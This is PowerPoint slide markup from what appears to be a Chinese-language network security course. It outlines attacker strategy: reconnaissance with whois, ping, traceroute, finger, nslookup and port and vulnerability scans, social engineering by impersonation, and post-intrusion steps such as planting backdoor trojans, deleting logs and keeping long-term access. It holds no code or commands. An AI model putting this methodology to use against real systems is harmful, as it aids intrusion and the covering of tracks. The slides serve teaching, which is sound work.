                  <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                </a:rPr>
                <a:t>攻击，获得系统一定权限</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51236" name="AutoShape 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2758877"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666699"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51247" name="Group 47"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="6549829" y="1447800"/>
            <a:ext cx="2165350" cy="4551363"/>
            <a:chOff x="4391" y="912"/>
            <a:chExt cx="1364" cy="2867"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51241" name="Rectangle 41"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4425" y="1335"/>
              <a:ext cx="1305" cy="705"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:schemeClr val="accent4">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6" name="Group 46"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="4391" y="912"/>
              <a:ext cx="1364" cy="2867"/>
              <a:chOff x="4391" y="912"/>
              <a:chExt cx="1364" cy="2867"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="51238" name="Text Box 38"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4391" y="912"/>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b="1">
                    <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                    <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                  </a:rPr>
                  <a:t>攻击后</a:t>
                </a:r>
                <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" b="1">
                  <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                  <a:ea typeface="黑体" pitchFamily="49" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="51239" name="Rectangle 39"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4425" y="2040"/>
                <a:ext cx="1305" cy="1739"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="accent4">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40" name="Text Box 40"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4472" y="2087"/>
                <a:ext cx="1258" cy="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内容：</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcBef>
                    <a:spcPct val="50000"/>
                  </a:spcBef>
                </a:pPr>
                <a:r>
                  <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                    <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                    <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  </a:rPr>
                  <a:t>植入后门木马</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcBef>
                    <a:spcPct val="50000"/>
                  </a:spcBef>
                </a:pPr>
                <a:r>
                  <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                    <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                    <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  </a:rPr>
                  <a:t>删除日志</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcBef>
                    <a:spcPct val="50000"/>
                  </a:spcBef>
                </a:pPr>
                <a:r>
                  <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                    <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                    <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  </a:rPr>
                  <a:t>修补明显的漏洞</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr>
                  <a:spcBef>
                    <a:spcPct val="50000"/>
                  </a:spcBef>
                </a:pPr>
                <a:r>
                  <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                    <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                    <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  </a:rPr>
                  <a:t>进一步渗透扩展</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="51242" name="Text Box 42"/>
              <p:cNvSpPr txBox="1">
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="447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kumimoji="1" lang="zh-CN" altLang="en-US" sz="1600" b="1">
                    <a:latin typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                    <a:ea typeface="楷体_GB2312" pitchFamily="49" charset="-122"/>
                  </a:rPr>
                  <a:t>消除痕迹，长期维持一定权限</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51243" name="AutoShape 43"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5791002"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lgn="ctr">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34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10015194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51248"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="blinds(vertical)">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="512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36"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="12" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51236"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5123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51245"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="18" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51245"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="19" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5124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1243"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="24" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51243"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5124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51247"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="30" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="51247"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="31" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="512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6" grpId="0" animBg="1"/>
      <p:bldP spid="512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nchor="b">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" dirty="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>黑客攻击策略步骤</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="296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16632"/>
            <a:ext cx="8043862" cy="674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14BEF07-BD7B-49AC-8394-8967A3627B43}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5324132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rmAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>内容</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网络、主机（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>域名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）是否存活</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>端口（服务）是否开放</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>到要入侵点的路由</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>主机操作系统（指纹）识别</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>应用、资源和用户信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用途：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>指导攻击行为：攻击方式、工具、路径等选择</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10242" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>信息收集、目标分析</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="169963859"/>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t>信息收集、目标分析的方式、手段</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54275" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>技术手段</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>非技术手段</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="内容占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：查询域名注册信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Ping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：判断目标主机是否开启，及数据包往返时间</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Traceroute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：跟踪从一台计算机到另外一台计算机所走的路径</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Rusers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> / Finger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：收集用户信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>netcraft.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：查询大部分知名网站信息。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Host / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>：主机名解析到网络地址或网络地址解析到主机名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>port scan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞扫描</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="内容占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>公开信息分析</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>从目标机构的网站获取</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>新闻报道，出版物</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>新闻组或论坛</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>搜索引擎</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>社会工程手段</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>假冒他人，获取第三方的信任</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="灯片编号占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{45CA1F53-DDA1-4EF0-A9E1-D01E00B7FF11}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3193467461"/>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zh-CN" altLang="en-US"/>
              <a:t>域名与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>查询</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148483" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148484"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48485"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12C4494-9FEC-49A0-920C-EEF549D81AF1}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" sz="1000" b="0">
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1000" b="0">
              <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="148486" name="文字版面配置區 6"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4356100" y="1196975"/>
            <a:ext cx="45593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200150" indent="-28575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rgbClr val="3399FF"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0" err="1">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>Whois</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>：域名与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>信息收集</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" b="0" dirty="0">
              <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="20000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="FF9900"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>一个标准服务，查询域名</a:t>
            </a:r>
            <a:r>
